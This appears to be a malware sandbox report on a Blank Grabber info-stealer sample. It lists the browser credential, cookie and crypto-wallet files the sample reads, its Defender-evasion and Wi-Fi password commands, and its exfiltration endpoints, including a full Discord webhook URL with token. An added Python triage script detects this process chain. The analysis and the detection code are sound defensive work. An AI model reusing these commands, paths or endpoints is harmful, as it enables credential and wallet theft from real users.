              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 9g9LZNE4bH.exe PID: 6176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
ATT&CK matrix (techniques listed per tactic; a number in parentheses is the count shown in the report's cell for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (241); Native API (1); Command and Scripting Interpreter (22); PowerShell (3); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (4); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (11); Timestomp (1); DLL Side-Loading (1); Virtualization/Sandbox Evasion (141); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); File and Directory Discovery (2); System Information Discovery (48); Security Software Discovery (151); Process Discovery (2); Virtualization/Sandbox Evasion (141); Application Window Discovery (1); System Network Configuration Discovery (1); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (3); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Data Encrypted for Impact (1); System Shutdown/Reboot (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1584119 | Sample: 9g9LZNE4bH.exe | Start date: 04/01/2025 | Architecture: WINDOWS | Score: 100

Network contacts in the graph:
  ip-api.com, 208.95.112.1, port 80 (local port 49816), TUT-ASUS, United States
  discord.com, 162.159.137.232, port 443 (local port 49822), CLOUDFLARENETUS, United States

Sample-level signatures in the graph: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; Yara detected Blank Grabber; 9 other signatures

Process tree (node numbers are the graph's own):
  [11] 9g9LZNE4bH.exe
       dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+); C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 16 other files (none is malicious)
       signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords; 2 other signatures
    [15] 9g9LZNE4bH.exe
         network: ip-api.com 208.95.112.1:80; discord.com 162.159.137.232:443
         signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 5 other signatures
      [19] cmd.exe
           signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; Uses netsh to modify the Windows network and firewall settings
        [28] powershell.exe
             signatures: Loading BitLocker PowerShell Module
        [31] conhost.exe
      [22] cmd.exe
           signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
        [33] powershell.exe
        [43] 2 other processes
      [24] cmd.exe
           signatures: Adds a directory exclusion to Windows Defender
        [35] powershell.exe
        [37] conhost.exe
      [26] 24 other processes
           signatures: Tries to harvest and steal WLAN passwords
        [39] getmac.exe
             signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
        [41] systeminfo.exe
        [45] 46 other processes
             dropped: C:\Users\user\AppData\Local\Temp\BPWmX.zip (RAR); C:\Users\user\AppData\...\3lfchnc2.cmdline (Unicode)
          [48] csc.exe
               dropped: C:\Users\user\AppData\Local\...\3lfchnc2.dll (PE32)
            [51] cvtres.exe
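The process tree above is the part of this report a detection engineer can act on: one PyInstaller parent spawning cmd.exe children that run encoded PowerShell, a Defender exclusion, a WLAN profile dump, a password-protected rar and a csc.exe compile out of Temp. The following triage helper is an added example written for this page; it is not code from the report, from Joe Sandbox or from the Blank Grabber project. It evaluates a list of process-creation events against those behaviours and groups hits by their top-most ancestor, so that several individually weak rules firing under one root become a chain verdict. The events are constructed: only the image names, the two sample PIDs (5860 and 6176) and the dropped-file names BPWmX.zip and 3lfchnc2.cmdline come from the report; every command line, the other PIDs and the Add-MpPreference payload are assumptions shaped after the signature names in the report. The logic generalises to any event source that gives pid, ppid, image and command line (Sysmon event 1, EDR telemetry, a sandbox process list).

```python
"""Process-chain triage for a Blank Grabber-style process tree (added example).

Events are CONSTRUCTED to mirror the chain the report shows; command lines,
PIDs other than 5860/6176 and the encoded payload are assumptions.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Assumed payload behind -EncodedCommand (PowerShell expects base64 of UTF-16LE).
ASSUMED_PAYLOAD = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Local\\Temp"'
ENCODED_PAYLOAD = base64.b64encode(ASSUMED_PAYLOAD.encode("utf-16-le")).decode("ascii")
PS_CMD = f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED_PAYLOAD}"

SAMPLE_EVENTS = [  # constructed sample input
    ProcEvent(5860, 1000, r"C:\Users\user\Desktop\9g9LZNE4bH.exe", "9g9LZNE4bH.exe"),
    ProcEvent(6176, 5860, r"C:\Users\user\Desktop\9g9LZNE4bH.exe", "9g9LZNE4bH.exe"),
    ProcEvent(7001, 6176, r"C:\Windows\System32\cmd.exe", f'cmd.exe /c "{PS_CMD}"'),
    ProcEvent(7002, 7001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", PS_CMD),
    ProcEvent(7003, 6176, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c netsh wlan show profile "HomeWiFi" key=clear'),
    ProcEvent(7004, 7003, r"C:\Windows\System32\netsh.exe",
              'netsh wlan show profile "HomeWiFi" key=clear'),
    ProcEvent(7005, 6176, r"C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe",
              r'rar.exe a -r -hp"secret" -m5 C:\Users\user\AppData\Local\Temp\BPWmX.zip '
              r'C:\Users\user\AppData\Local\Temp\loot'),
    ProcEvent(7006, 6176, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2.cmdline"'),
]

PS_ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
PS_BYPASS_RE = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+bypass", re.I)
MPPREF_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
NETSH_WLAN_RE = re.compile(r"netsh\s+wlan\s+show\s+profile.*key\s*=\s*clear", re.I)
RAR_PWD_RE = re.compile(r"\s-(?:hp|p)\S+", re.I)   # -p<pwd> or -hp<pwd> (encrypted headers)
RAR_LEVEL_RE = re.compile(r"\s-m[0-5]\b", re.I)   # explicit compression level
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not decodable."""
    m = PS_ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def evaluate(ev):
    """Yield (rule, matching report signature) pairs that one event trips."""
    name, cl = basename(ev.image), ev.cmdline
    if name == "powershell.exe":
        payload = decode_encoded_powershell(cl)
        if payload is not None:
            yield "encoded_powershell", "Encrypted powershell cmdline option found"
            if MPPREF_RE.search(payload):  # inspect the decoded text, not the base64
                yield "defender_exclusion", "Adds a directory exclusion to Windows Defender"
        if PS_BYPASS_RE.search(cl):
            yield "execution_policy_bypass", "Bypasses PowerShell execution policy"
    elif name == "netsh.exe" and NETSH_WLAN_RE.search(cl):
        yield "wlan_password_capture", "Tries to harvest and steal WLAN passwords"
    elif name == "rar.exe" and RAR_PWD_RE.search(cl) and RAR_LEVEL_RE.search(cl):
        yield "password_protected_rar", "Sigma detected: Rar Usage with Password and Compression Level"
    elif name == "csc.exe" and TEMP_RE.search(cl):
        yield "csc_from_temp", "Sigma detected: Dot net compiler compiles file from suspicious location"


def root_pid(pid, by_pid):
    """Walk ppid links to the top-most ancestor present in the event set."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def triage(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        for rule, signature in evaluate(ev):
            findings.append({"pid": ev.pid, "root": root_pid(ev.pid, by_pid),
                             "rule": rule, "signature": signature})
    return findings


def stealer_chain_roots(findings, min_rules=3):
    """Roots whose descendants trip at least min_rules distinct rules."""
    rules_by_root = {}
    for f in findings:
        rules_by_root.setdefault(f["root"], set()).add(f["rule"])
    return {root for root, rules in rules_by_root.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"pid {f['pid']} (root {f['root']}): {f['rule']} -> {f['signature']}")
    print("stealer-chain roots:", stealer_chain_roots(found))
```

Two design points matter in practice. The Defender check runs on the decoded UTF-16LE payload rather than on the base64 text, because a substring rule on the encoded form misses the cmdlet entirely. And the verdict is taken per root rather than per process: cmd.exe launching PowerShell with a bypass flag is noisy on its own, but the same ancestor also spawning a WLAN profile dump and a password-protected rar is the combination this report documents.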

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
  9g9LZNE4bH.exe | 46% | Virustotal |
  9g9LZNE4bH.exe | 42% | ReversingLabs | Win64.Trojan.Dacic

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
  C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\libffi-8.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\select.pyd | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll | 0% | ReversingLabs |
  C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd | 0% | ReversingLabs |

No Antivirus matches
No Antivirus matches

URL reputation (Source | Detection | Scanner | Label):
  http://www.microsoftNAV_CO~1.JSOy. | 0% | Avira URL Cloud | safe
  https://api.anonfiles.com/uploadr | 0% | Avira URL Cloud | safe
  https://api.anonfiles.com/upload- | 0% | Avira URL Cloud | safe
  http://www.microsoftTASKLI~1.TXTy. | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
  discord.com | 162.159.137.232 | true | false | | high
  ip-api.com | 208.95.112.1 | true | false | | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
  https://discord.com/api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9c | false | | high
URLs by source (Name | Source | Malicious | Antivirus Detection | Reputation):
  https://duckduckgo.com/chrome_newtab | 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/Blank-c/BlankOBF | 9g9LZNE4bH.exe, 00000002.00000003.2040645327.000001F12BC08000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041272550.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041841981.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://www.avito.ru/ | 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://duckduckgo.com/ac/?q= | 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://api.telegram.org/bot | 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/Blank-c/Blank-Grabberi | 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
  http://crl.microsoft | powershell.exe, 0000002A.00000002.2299859889.000001C053700000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://www.ctrip.com/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://github.com/Blank-c/Blank-Grabberr | 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/urllib3/urllib3/issues/2168 | 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://www.leboncoin.fr/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://tools.ietf.org/html/rfc2388#section-4.4 | 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/urlli?Z | 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://weibo.com/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://api.anonfiles.com/upload | 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://www.msn.com | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://api.anonfiles.com/upload- | 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2222117000.000001B991E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03CCF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://discord.com/api/v9/users/ | 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | false | | high
